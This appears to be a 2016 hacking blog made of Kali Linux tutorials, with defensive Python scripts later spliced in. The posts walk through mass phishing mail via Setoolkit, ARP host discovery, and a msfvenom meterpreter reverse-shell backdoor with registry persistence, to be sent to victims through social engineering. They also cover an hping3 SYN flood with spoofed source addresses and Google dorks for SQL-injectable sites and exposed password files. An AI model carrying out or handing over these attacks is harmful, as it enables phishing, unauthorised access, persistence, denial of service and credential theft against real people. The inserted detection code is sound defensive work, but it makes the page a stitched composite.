Saturday, 17 December 2016

Email Spamming / Mass Mailing on Kali Linux

What is Email Spamming

Mass mailing is the method of sending the same e-mail message to a large number of people at the same time.
The mass mailing concept is used for phishing attacks, spamming and promoting a business online.
Before we begin the mass mailing attack, the first thing we need to do is create an email list. Check this tutorial on harvesting email addresses: it searches for e-mail addresses, collects them and places them into a text file. Once your email list is ready we are good to go, so let's start.
The tool we are going to use is Setoolkit. Setoolkit is pre-installed in Kali, so let's do it.
Once your list is ready, open your terminal and type:
root@seven:~# setoolkit
When you use Setoolkit for the first time you will be asked to accept the terms and conditions; just type y and hit enter.
From the menu select 1, Social-Engineering Attacks.
From the next menu select 5, Mass Mailer Attack.
Now choose E-Mail Attack Mass Mailer and press enter.

Now we need to give the path to our file. In my case I have placed my file on the desktop, so my path looks like this: /root/Desktop/seven.txt. Press enter.
Select option 1, Use a gmail Account for your email attack, and press enter.
Now enter the email address you are going to use; I am using anon24644@gmail.com. Hit enter.
Enter the username that you want the recipient to see and press enter.
Enter your gmail password. The password field is not visible, so type your password carefully.
You have to specify whether or not you want to flag your email as high priority; just answer no and press enter.
Enter your email subject and press enter.
set:phishing > Email subject: Enter your subject
Now you will be asked whether to send the message as plain text or HTML; select p and press enter.
Now enter the body of your message. When you are finished with your message, type END in uppercase on its own line and hit enter.
If you have followed correctly then the email will be sent to every address in your list.
Do share if it helped you.

Scan Live hosts using Netdiscover in Kali Linux

Netdiscover is a simple tool to use. It uses ARP (Address Resolution Protocol) to find live hosts. Netdiscover discovers live hosts on a network, but you must be connected to that network.
Netdiscover not only finds the live hosts but also returns their MAC addresses and hostnames.
netdiscover is an active/passive arp reconnaissance tool, initially developed to gain information about wireless networks without dhcp servers in wardriving scenarios. It can also be used on switched networks. Built on top of libnet and libpcap, it can passively detect online hosts or search for them by sending arp requests.

Start Netdiscover

With the command below you can see all the options that can be used with netdiscover.
root@seven:~# netdiscover -h
Netdiscover 0.3-pre-beta7 [Active/passive arp reconnaissance tool]
  -i device: your network device
  -r range: scan a given range instead of auto scan. 192.168.6.0/24
  -l file: scan the list of ranges contained into the given file
  -p passive mode: do not send anything, only sniff
  -m file: scan the list of known MACs and host names
  -F filter: Customize pcap filter expression (default: "arp")
  -s time: time to sleep between each arp request (miliseconds)
  -n node: last ip octet used for scanning (from 2 to 253)
  -c count: number of times to send each arp requests 
  -f enable fastmode scan, saves a lot of time, recommended for auto
  -d ignore home config files for autoscan and fast mode

Autoscan

As soon as you start netdiscover it starts sending ARP requests over the network and prints out the result whenever it finds a live host. You can specify a range too.
root@seven:~# netdiscover 
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.150.1   00:50:56:c0:00:08      1      60  VMware, Inc.                
 192.168.150.2   00:50:56:ec:30:74      1      60  VMware, Inc.                
 192.168.150.254 00:50:56:e2:92:e5      1      60  VMware, Inc.
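An added example from the defender's side, not part of the original post: the script below parses netdiscover's table output (the sample rows are constructed, modelled on the output above, with one extra invented host) and compares it against an inventory of known MAC addresses, the same idea as the -m option, so that a device which should not be on the LAN stands out. The KNOWN_HOSTS inventory is an assumption.

```python
import re

# Constructed sample of netdiscover output, modelled on the table above; the
# last row is an invented extra host, not a real capture.
NETDISCOVER_OUTPUT = """\
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.150.1   00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.150.2   00:50:56:ec:30:74      1      60  VMware, Inc.
 192.168.150.254 00:50:56:e2:92:e5      1      60  VMware, Inc.
 192.168.150.77  08:00:27:13:37:aa      3      60  PCS Systemtechnik GmbH
"""

# Assumed inventory of devices that are allowed on this LAN (MAC -> label).
KNOWN_HOSTS = {
    "00:50:56:c0:00:08": "vmnet gateway",
    "00:50:56:ec:30:74": "vmnet dns",
    "00:50:56:e2:92:e5": "vmnet dhcp",
}

ROW_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})"
    r"\s+(\d+)\s+(\d+)\s+(.*?)\s*$", re.IGNORECASE)

def parse_netdiscover(text):
    """Turn netdiscover's table into a list of host dicts, skipping the
    header and rule lines."""
    hosts = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            hosts.append({"ip": m[1], "mac": m[2].lower(), "count": int(m[3]),
                          "len": int(m[4]), "vendor": m[5]})
    return hosts

def unknown_hosts(hosts, known):
    """Return hosts whose MAC is not in the inventory; this is what an
    unexpected laptop, VM or rogue device on the segment looks like."""
    return [h for h in hosts if h["mac"] not in known]

if __name__ == "__main__":
    for h in unknown_hosts(parse_netdiscover(NETDISCOVER_OUTPUT), KNOWN_HOSTS):
        print(f"unknown device {h['ip']} {h['mac']} ({h['vendor']})")
```

Pipe a real run in with `netdiscover -r 192.168.150.0/24 -P` (the -P option prints parsable output and is not shown in the help above; treat it as an assumption about your version) or paste the table into NETDISCOVER_OUTPUT.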

Scan with range

In order to scan a specific range you must give the -r option to netdiscover. The command below will scan for all the live hosts on a network: it probes all 254 host addresses in the range and only prints the live hosts on screen.
root@seven:~# netdiscover -r 192.168.1.0/24

A quick scan

When you do an autoscan it is always a good idea to give the -f option as well. It saves time.
root@seven:~# netdiscover -f

How to create a persistent backdoor using Metasploit in Kali Linux

What is a backdoor

Before starting I would like to give a brief overview of backdoors. A backdoor is a program which is used to control and monitor the victim's computer remotely without being detected. A backdoor is a malicious program that enables hackers to access systems: they can modify files, and copy and steal personal information. A backdoor is also known as a trap door or trojan horse.
Backdoors are sent to the victims' systems either by someone or bound with another program.
In simple words when we
So now that we know what a backdoor is, let's start.
We are going to use msfvenom to create the payload. So open your terminal and type the following command:
root@seven:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.130 LPORT=4444 -f exe >backdoor.exe
Replace LHOST with your IP address.
On successful completion a file named backdoor.exe will be created and saved in your home directory. Now we are done with msfvenom. Next, open Metasploit, because this is where we will be doing the real work, such as viewing sessions.
Type the following command in the terminal:
root@seven:~# msfconsole
Now we need to use the handler exploit, so type:
msf > use exploit/multi/handler
Now set the payload to windows meterpreter reverse tcp; type:
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
Set your LHOST (your IP address). Replace the IP address with yours.
msf exploit(handler) > set LHOST 192.168.150.130 
LHOST => 192.168.150.130
Set your LPORT
msf exploit(handler) > set LPORT 4444
LPORT => 4444
Now we are all set; type exploit. When you type the command below the handler will start and run in the background. Once your stage is set we are ready to go further.
Now find a way to send the payload that we generated to the victim's machine. Use your social engineering skills. When the victim clicks it we can exploit them. There are a couple of ways to send the backdoor to the victim's machine: use your social engineering skills or bind it with some other application.
The command below runs the handler as a background job (-j) and keeps you at the msf prompt instead of dropping into the first session (-z).
msf exploit(handler) > exploit -j -z
Now type the help command to see the options you can use with the victim's machine. As you can see there are plenty of options you can use.
meterpreter > help
Now type sysinfo to see the victim's system information.
meterpreter > syinfo
[-] Unknown command: syinfo.
meterpreter > sysinfo
Computer        : DARKNIGTHT
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >
As you can see, I ran the backdoor on my Win8 machine to test, and I am getting its information remotely.
Now we need to make it persistent, so that whenever our victim logs in we get a session. Just type the command below to get the persistence help menu. You have many options here; it's up to you how to use them.
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L   Location in target host to write payload to, if none %TEMP% will be used.
    -P   Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T   Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on which the system running Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back

Now we need to use the -U option to create the persistent backdoor. The command below will write the script into autorun, so whenever your victim logs in a session will be created.
meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.150.130 
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DARKNIGTHT_20161027.3914/DARKNIGTHT_20161027.3914.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.150.130 LPORT=4444
[*] Persistent agent script is 148428 bytes long
[+] Persistent Script written to C:\Users\ZEEROS~1\AppData\Local\Temp\uXwdPFQQc.vbs
[*] Executing script C:\Users\ZEEROS~1\AppData\Local\Temp\uXwdPFQQc.vbs
[+] Agent executed with PID 3440
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sYidKTQoKVgpjRD
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sYidKTQoKVgpjRD
meterpreter >
-r The IP address of your machine (the one running the handler).
-i The interval in seconds between each connection attempt.
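An added example from the defender's side, not part of the original post: the persistence output above leaves a distinctive footprint (a randomly named value under HKCU\...\Run that launches a .vbs script from %TEMP%), and the script below audits Run entries for exactly those traits. The SAMPLE_RUN_VALUES entries are constructed, modelled on the output above; on Windows the same check runs against the live key via winreg.

```python
import math
import re
import sys
from collections import Counter

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# values, modelled on the persistence output above; not read from a real host.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "sYidKTQoKVgpjRD": r"C:\Users\ZEEROS~1\AppData\Local\Temp\uXwdPFQQc.vbs",
}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".bat", ".cmd", ".ps1")
TEMP_DIR_RE = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)

def shannon_entropy(s):
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def looks_random(name):
    # Heuristic: long, all letters, mixed case, no separators and high entropy,
    # like the generated names in the output above.
    return (name.isalpha() and len(name) >= 10 and shannon_entropy(name) > 3.3
            and re.search(r"[a-z][A-Z]", name) is not None)

def audit_run_values(values):
    """Return (name, command, reasons) for each Run entry showing persistence traits."""
    findings = []
    for name, cmd in values.items():
        reasons = [why for hit, why in (
            (TEMP_DIR_RE.search(cmd), "runs from a Temp directory"),
            (cmd.lower().rstrip('"').endswith(SCRIPT_EXTS), "script file, not an installed program"),
            (looks_random(name), "value name looks randomly generated")) if hit]
        if reasons:
            findings.append((name, cmd, reasons))
    return findings

def read_hkcu_run():
    """On Windows enumerate the live Run key; elsewhere return the sample."""
    if sys.platform != "win32":
        return SAMPLE_RUN_VALUES
    import winreg
    values, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:          # no more values under the key
                return values
            values[name] = str(data)
            i += 1
```

Call audit_run_values(read_hkcu_run()) to list the suspicious entries; the entropy threshold is a heuristic and will also flag some legitimate vendor names, so review hits rather than deleting them blindly.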
That's it for this tutorial. That was a basic way to create a backdoor. I am definitely writing more tutorials on backdoors. Please do share if it helps you.

How to use hping3 in Kali Linux (performing a DoS attack)

What is hping3

hping3 is a network tool able to send custom TCP/IP packets and to display target replies like the ping program does with ICMP replies. hping3 handles fragmentation, arbitrary packet body and size and can be used in order to transfer files encapsulated under supported protocols.
hping3 is extremely powerful; you can do the following things with it:
  • Test firewall rules
  • Advanced port scanning
  • Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.
  • Path MTU discovery
  • Transferring files between even really fascist firewall rules.
  • Traceroute-like under different protocols.
  • Firewalk-like usage.

What is a DoS attack

DoS stands for denial of service. A DoS attack shuts down web servers/systems and makes them completely inaccessible to users.
A DoS attack floods the target network with excess requests; this slows it down and eventually forces web servers and systems to shut down.
Before performing a DoS you will need the IP address of your victim, and remember the victim should be connected to the same network as you. You can use the Netdiscover tool to find the IP address of the victim.
hping3 is really easy to use, so fire up your terminal and type the following command:
root@seven:~# hping3 -S --flood -V 192.168.43.2
-S Sets the TCP SYN flag, which means you are sending SYN packets.
--flood Sends lots of packets and ignores the responses; it sends packets as fast as possible.
After a few minutes, once hping3 has flooded the system with packets, the target will be forced off the network.
We are not done here: this way there is a chance of getting caught, so we need to randomize our source IP address to protect our identity.
So type the following command:
root@seven:~# hping3 -S -U --flood --rand-source -V 192.168.150.140 
--rand-source Randomizes the source IP address.
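An added example from the defender's side, not part of the original post: fed tcpdump-style packet summaries (constructed here, including a --rand-source style burst of SYN+URG packets), it counts bare SYNs per destination in a sliding one-second window and reports whether the source addresses look randomised, which is how the two floods above appear to whoever is watching the target's traffic. The line format, window and thresholds are assumptions.

```python
import random
import re
from collections import defaultdict

# tcpdump-style summary: "HH:MM:SS.uuuuuu IP src.sport > dst.dport: Flags [..], ..."
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d)\.(?P<us>\d{6}) IP (?P<src>[\d.]+)\.\d+ > "
    r"(?P<dst>[\d.]+)\.\d+: Flags \[(?P<flags>[^\]]*)\]")

def detect_syn_floods(lines, window=1.0, threshold=100, spoof_ratio=0.9):
    """Map each flooded destination to (largest SYN burst within `window`
    seconds, distinct sources in that burst, whether sources look randomised)."""
    syns = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or "S" not in m["flags"] or "." in m["flags"]:
            continue                                  # keep bare SYNs only (ACK clear)
        h, mi, s = (int(x) for x in m["ts"].split(":"))
        syns[m["dst"]].append((h * 3600 + mi * 60 + s + int(m["us"]) / 1e6, m["src"]))
    alerts = {}
    for dst, events in syns.items():
        events.sort()
        start, best = 0, (0, 0)
        for end, (t, _) in enumerate(events):        # sliding window over time
            while t - events[start][0] > window:
                start += 1
            if end + 1 - start > best[1] - best[0]:
                best = (start, end + 1)
        burst = events[best[0]:best[1]]
        if len(burst) > threshold:
            srcs = {src for _, src in burst}
            alerts[dst] = (len(burst), len(srcs), len(srcs) / len(burst) >= spoof_ratio)
    return alerts

def constructed_capture(seed=1):
    """Constructed lines, not a real capture: a --rand-source style SYN+URG
    burst at 192.168.150.140 plus a few normal handshakes with another host."""
    rng = random.Random(seed)
    lines = []
    for i in range(300):
        src = ".".join(str(rng.randint(1, 254)) for _ in range(4))
        lines.append(f"12:00:00.{i * 2000:06d} IP {src}.{rng.randint(1024, 65535)} > "
                     "192.168.150.140.80: Flags [SU], seq 0, win 512, length 0")
    for i in range(5):
        lines.append(f"12:00:0{i}.100000 IP 192.168.150.130.5{i}000 > 192.168.150.1.443: "
                     "Flags [S], seq 0, win 64240, length 0")
        lines.append(f"12:00:0{i}.100500 IP 192.168.150.1.443 > 192.168.150.130.5{i}000: "
                     "Flags [S.], seq 0, ack 1, win 65160, length 0")
    return lines
```

A real feed is `tcpdump -nn -l 'tcp[tcpflags] & tcp-syn != 0'` read line by line; a high distinct-source ratio separates a spoofed flood (nothing to block per source) from a handful of noisy clients.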
That was simple and straightforward. Please do share if it helped you.

Google dorking hacking techniques

What is Google Dorking?

Google dorking is an advanced technique to retrieve or obtain information from Google. Google dorking is mostly used to find vulnerable targets and sensitive data using advanced search queries.
In other words, Google dorking is the art of making Google search more efficient and simpler.

Basic Google dorking techniques:

Just like programming languages, Google also uses search operators. There are plenty of search operators to refine a Google search. Some commonly used ones are:
1. intitle     returns the pages that contain the string you specify. Example:
intitle:python tutorial   returns the pages which have python tutorial in the title text.
2. allintitle:admin login   returns the pages whose title has both admin and login in it.
3. inurl:adminlogin.php     returns the pages which have adminlogin.php in their URL. You can use a similar term to find ASP pages: inurl:adminlogin.asp.
inurl:login
4. related:www.tutorialpoint.com    returns websites similar to tutorialpoint.
5. cache:www.tutorialpoint.com    returns the cached page even when the website is down or the internet is not working.
6. ext:ppt python   returns ppt files on python.
7. site:www.python.com   returns the links within python.com.
8. book:python language   searches for python books inside Google's online library.

Dorks for finding sites vulnerable to SQL injection

  1. inurl:newsDetail.php?id=
  2. inurl:news.php?id=
  3. inurl:avd_start.php?avd=
  4. inurl:event.php?id=
  5. inurl:product-item.php?id=
  6. inurl:aboutbook.php?id=
  7. inurl:show.php?id=
  8. inurl:newsitem.php?num=
  9. inurl:play_old.php?id=
  10. inurl:games.php?id=
  11. inurl:page.php?file=
  12. inurl:newsDetail.php?id=
  13. inurl:gallery.php?id=
  14. inurl:article.php?id=
  15. inurl:view_product.php?id=
  16. inurl:sw_comment.php?id=
  17. inurl:sql.php?id=
  18. inurl:avd_start.php?avd=
  19. inurl:news.php?id=
  20. inurl:kategorie.php4?id=
  21. inurl:faq2.php?id=
  22. inurl:opinions.php?id=
  23. inurl:pages.php?id=
  24. inurl:participant.php?id=
  25. inurl:participant.php?id=
  26. inurl:chappies.php?id=
  27. inurl:prod_detail.php?id=
  28. inurl:productinfo.php?id=
  29. inurl:review.php?id=
  30. inurl:page.php?id=
  31. inurl:newsid=
  32. inurl:news_display.php?getid=
  33. inurl:news-full.php?id=
  34. inurl:newsid=
  35. inurl:item_id=
  36. inurl:shredder-categories.php?id=
  37. inurl:main.php?id=
  38. inurl:download.php?id=
  39. inurl:avd_start.php?avd=
  40. intitle:Login * Webmailer
  41. inurl:staff_id=
  42. inurl:staff_id=
  43. inurl:show.php?id=
  44. inurl:newsDetail.php?id=
  45. inurl:newsitem.php?num=
  46. inurl:pageid=
  47. inurl:article.php?ID=
  48. intitle:ANNOUNCE -inurl:lists
  49. inurl:curriculum.php?id=
  50. inurl:tekst.php?idt
  51. inurl:newsticker_info.php?idn=

Advanced Google dorking techniques

Dorks for finding password lists

inurl:wp-content/uploads filetype:xls | filetype:xlsx password
filetype:log intext:password | pass | pw
inurl:"ftp" intext:"user" | "username" | "userID" | "user ID" | "logon" | "login" intext:"password" | "passcode" filetype:xls | filetype:xlsx
intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx
ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD
inurl:etc -intext:etc ext:passwd

Dorks for finding usernames

site:extremetracking.com inurl:"login="
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
inurl:root.asp?acs=anon
filetype:conf inurl:proftpd.conf -sample